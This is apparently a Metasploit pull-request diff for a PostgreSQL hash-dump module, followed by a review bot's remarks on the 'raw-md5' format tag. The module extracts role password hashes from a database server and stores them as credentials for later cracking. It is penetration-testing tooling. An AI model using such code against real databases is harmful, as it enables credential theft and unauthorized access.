Merge pull request #40 from rapid7/feature/MSP-9748/postgres_hashdump
Feature/msp 9748/postgres hashdumpbug/bundler_fix
commit
4bc543715d
|
@ -53,12 +53,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Query appears to have run successfully")
|
||||
end
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
:name => 'postgres',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Postgres Server Hashes',
|
||||
|
@ -66,6 +60,22 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(rhost,true),
|
||||
port: rport,
|
||||
service_name: 'postgres',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
jtr_format: 'raw-md5',
|
||||
module_fullname: self.fullname,
|
||||
private_type: :nonreplayable_hash
|
||||
}
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
|
||||
res[:complete].rows.each do |row|
|
||||
|
@ -73,23 +83,24 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if row[0].empty? or row[1].empty?
|
||||
password = row[1]
|
||||
password.slice!(0,3)
|
||||
|
||||
credential_data[:username] = row[0]
|
||||
credential_data[:private_data] = password
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||
}
|
||||
login_data.merge!(service_data)
|
||||
create_credential_login(login_data)
|
||||
|
||||
tbl << [row[0], password]
|
||||
end
|
||||
print_good("#{tbl.to_s}")
|
||||
report_hash(tbl.to_csv,this_service)
|
||||
|
||||
|
||||
end
|
||||
|
||||
#Reports the Stolen Hashes back to the Database for later cracking
|
||||
def report_hash(hashtable,service)
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
|
||||
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
|
||||
print_status("Hash Table has been saved: #{path}")
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
|
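Review bot: `jtr_format: 'raw-md5'` in the new `credential_data` hash labels the stored value as a plain, unsalted MD5, which is not what PostgreSQL keeps for a role. Its `md5`-prefixed verifier is an MD5 over the password concatenated with the role name, so any consumer that trusts the tag will misclassify the record. `password.slice!(0,3)` also drops the prefix without checking it is there, so a value in any other form is silently truncated and still filed as `raw-md5`. I would guard the slice with `next unless password.start_with?('md5')` and add a comment above `credential_data` such as `# Postgres verifier: 'md5' + md5(password + username); the username acts as the salt`. The tag should be revisited once a Postgres-specific format is confirmed to be accepted by the credential API. The enclosing method starts above the first hunk, so whether `row[1]` can be nil for password-less roles cannot be checked from here.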